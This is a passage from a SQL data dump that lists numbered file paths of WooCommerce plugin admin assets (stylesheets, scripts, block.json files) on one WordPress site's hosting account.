/dbfe730286a89feb7ce0.svg'),(6659,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/df4b3b75be51b9e11f96.png','wp-content/plugins/woocommerce/assets/client/admin/df4b3b75be51b9e11f96.png'),(6660,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/e6774bfd47e76d1fdbb5.svg','wp-content/plugins/woocommerce/assets/client/admin/e6774bfd47e76d1fdbb5.svg'),(6661,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/edit-product-page/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/edit-product-page/style-rtl.css'),(6662,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/experimental/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/experimental/index.asset.php'),(6663,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/experimental/index.js','wp-content/plugins/woocommerce/assets/client/admin/experimental/index.js'),(6664,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/experimental/index.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/experimental/index.js.LICENSE.txt'),(6665,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/experimental/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/experimental/style-rtl.css'),(6666,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/experimental/style.css','wp-content/plugins/woocommerce/assets/client/admin/experimental/style.css'),(6667,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/explat/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/explat/index.asset.php'),(6668,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/explat/index.js','wp-content/plugins/woocommerce/assets/client/admin/explat/index.js'),(6669,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/explat/index.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/explat/index.js.LICENSE.txt'),(6670,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/f574e970a917e4dff5ec.png','wp-content/plugins/woocommerce/assets/client/admin/f574e970a917e4dff5ec.png'),(6671,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/homescreen/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/homescreen/style-rtl.css'),(6672,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/leaderboards/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/leaderboards/style-rtl.css'),(6673,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/marketing-coupons/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/marketing-coupons/style-rtl.css'),(6674,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/marketing-coupons/style.css','wp-content/plugins/woocommerce/assets/client/admin/marketing-coupons/style.css'),(6675,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/marketplace/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/marketplace/style-rtl.css'),(6676,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/multichannel-marketing/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/multichannel-marketing/style-rtl.css'),(6677,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/navigation/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/navigation/index.asset.php'),(6678,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/navigation/index.js','wp-content/plugins/woocommerce/assets/client/admin/navigation/index.js'),(6679,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/navigation-opt-out/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/navigation-opt-out/style-rtl.css'),(6680,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/navigation-opt-out/style.css','wp-content/plugins/woocommerce/assets/client/admin/navigation-opt-out/style.css'),(6681,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/notices/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/notices/index.asset.php'),(6682,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/notices/index.js','wp-content/plugins/woocommerce/assets/client/admin/notices/index.js'),(6683,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/null/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/null/style-rtl.css'),(6684,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/number/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/number/index.asset.php'),(6685,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/number/index.js','wp-content/plugins/woocommerce/assets/client/admin/number/index.js'),(6686,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/onboarding/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/onboarding/index.asset.php'),(6687,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/onboarding/index.js','wp-content/plugins/woocommerce/assets/client/admin/onboarding/index.js'),(6688,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/onboarding/index.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/onboarding/index.js.LICENSE.txt'),(6689,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/onboarding/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/onboarding/style-rtl.css'),(6690,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/onboarding/style.css','wp-content/plugins/woocommerce/assets/client/admin/onboarding/style.css'),(6691,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/payment-method-promotions/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/payment-method-promotions/style-rtl.css'),(6692,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/payment-method-promotions/style.css','wp-content/plugins/woocommerce/assets/client/admin/payment-method-promotions/style.css'),(6693,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/print-shipping-label-banner/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/print-shipping-label-banner/style-rtl.css'),(6694,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/print-shipping-label-banner/style.css','wp-content/plugins/woocommerce/assets/client/admin/print-shipping-label-banner/style.css'),(6695,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-category-metabox/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-category-metabox/style-rtl.css'),(6696,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-category-metabox/style.css','wp-content/plugins/woocommerce/assets/client/admin/product-category-metabox/style.css'),(6697,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/attributes/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/attributes/block.json'),(6698,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/attributes/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/attributes/edit.js'),(6699,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/attributes/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/attributes/index.js'),(6700,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/conditional/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/conditional/block.json'),(6701,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-attributes-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-attributes-field/block.json'),(6702,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-attributes-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-attributes-field/editor-rtl.css'),(6703,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-attributes-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-attributes-field/editor.css'),(6704,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-catalog-visibility-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-catalog-visibility-field/block.json'),(6705,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-checkbox-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-checkbox-field/block.json'),(6706,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-checkbox-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-checkbox-field/editor-rtl.css'),(6707,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-checkbox-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-checkbox-field/editor.css'),(6708,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-collapsible/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-collapsible/block.json'),(6709,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-description-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-description-field/block.json'),(6710,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-has-variations-notice/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-has-variations-notice/block.json'),(6711,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-has-variations-notice/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-has-variations-notice/editor-rtl.css'),(6712,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-has-variations-notice/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-has-variations-notice/editor.css'),(6713,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-images-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-images-field/block.json'),(6714,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-images-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-images-field/editor-rtl.css'),(6715,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-images-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-images-field/editor.css'),(6716,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-email-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-email-field/block.json'),(6717,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-email-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-email-field/editor-rtl.css'),(6718,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-email-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-email-field/editor.css'),(6719,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-quantity-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-quantity-field/block.json'),(6720,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-name-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-name-field/block.json'),(6721,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-name-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-name-field/editor-rtl.css'),(6722,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-name-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-name-field/editor.css'),(6723,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-password-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-password-field/block.json'),(6724,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-password-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-password-field/editor-rtl.css'),(6725,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-password-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-password-field/editor.css'),(6726,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-pricing-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-pricing-field/block.json'),(6727,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-pricing-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-pricing-field/editor-rtl.css'),(6728,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-pricing-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-pricing-field/editor.css'),(6729,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-radio-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-radio-field/block.json'),(6730,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-regular-price-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-regular-price-field/block.json'),(6731,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-regular-price-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-regular-price-field/editor-rtl.css'),(6732,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-regular-price-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-regular-price-field/editor.css'),(6733,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sale-price-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sale-price-field/block.json'),(6734,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sale-price-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sale-price-field/editor-rtl.css'),(6735,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sale-price-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sale-price-field/editor.css'),(6736,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-schedule-sale-fields/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-schedule-sale-fields/block.json'),(6737,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-schedule-sale-fields/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-schedule-sale-fields/editor-rtl.css'),(6738,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-schedule-sale-fields/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-schedule-sale-fields/editor.css'),(6739,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-section/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-section/block.json'),(6740,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-section/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-section/editor-rtl.css'),(6741,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-section/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-section/editor.css'),(6742,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-shipping-class-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-shipping-class-field/block.json'),(6743,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-shipping-dimensions-fields/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-shipping-dimensions-fields/block.json'),(6744,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-shipping-dimensions-fields/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-shipping-dimensions-fields/editor-rtl.css'),(6745,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-shipping-dimensions-fields/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-shipping-dimensions-fields/editor.css'),(6746,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sku-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sku-field/block.json'),(6747,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sku-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sku-field/editor-rtl.css'),(6748,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sku-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sku-field/editor.css'),(6749,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-summary-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-summary-field/block.json'),(6750,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-summary-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-summary-field/editor-rtl.css'),(6751,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-summary-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-summary-field/editor.css'),(6752,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-tab/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-tab/block.json'),(6753,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-tab/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-tab/editor-rtl.css'),(6754,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-tab/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-tab/editor.css'),(6755,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-tag-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-tag-field/block.json'),(6756,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-tag-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-tag-field/editor-rtl.css'),(6757,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-tag-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-tag-field/editor.css'),(6758,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-taxonomy-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-taxonomy-field/block.json'),(6759,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-taxonomy-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-taxonomy-field/editor-rtl.css'),(6760,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-taxonomy-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-taxonomy-field/editor.css'),(6761,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-toggle-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-toggle-field/block.json'),(6762,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variation-items-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variation-items-field/block.json'),(6763,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variation-items-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variation-items-field/editor-rtl.css'),(6764,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variation-items-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variation-items-field/editor.css'),(6765,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variations-fields/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variations-fields/block.json'),(6766,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variations-fields/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variations-fields/editor-rtl.css'),(6767,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variations-fields/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variations-fields/editor.css'),(6768,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variations-options-field/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variations-options-field/block.json'),(6769,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variations-options-field/editor-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variations-options-field/editor-rtl.css'),(6770,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variations-options-field/editor.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-variations-options-field/editor.css'),(6771,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/catalog-visibility/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/catalog-visibility/block.json'),(6772,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/catalog-visibility/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/catalog-visibility/edit.js'),(6773,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/catalog-visibility/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/catalog-visibility/index.js'),(6774,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/catalog-visibility/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/catalog-visibility/types.js'),(6775,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/checkbox/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/checkbox/block.json'),(6776,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/checkbox/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/checkbox/edit.js'),(6777,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/checkbox/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/checkbox/index.js'),(6778,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/collapsible/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/collapsible/block.json'),(6779,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/collapsible/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/collapsible/edit.js'),(6780,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/collapsible/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/collapsible/index.js'),(6781,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/conditional/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/conditional/block.json'),(6782,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/conditional/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/conditional/edit.js'),(6783,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/conditional/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/conditional/index.js'),(6784,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/description/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/description/block.json'),(6785,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/description/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/description/edit.js'),(6786,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/description/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/description/index.js'),(6787,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/images/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/images/block.json'),(6788,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/images/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/images/edit.js'),(6789,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/images/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/images/index.js'),(6790,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/b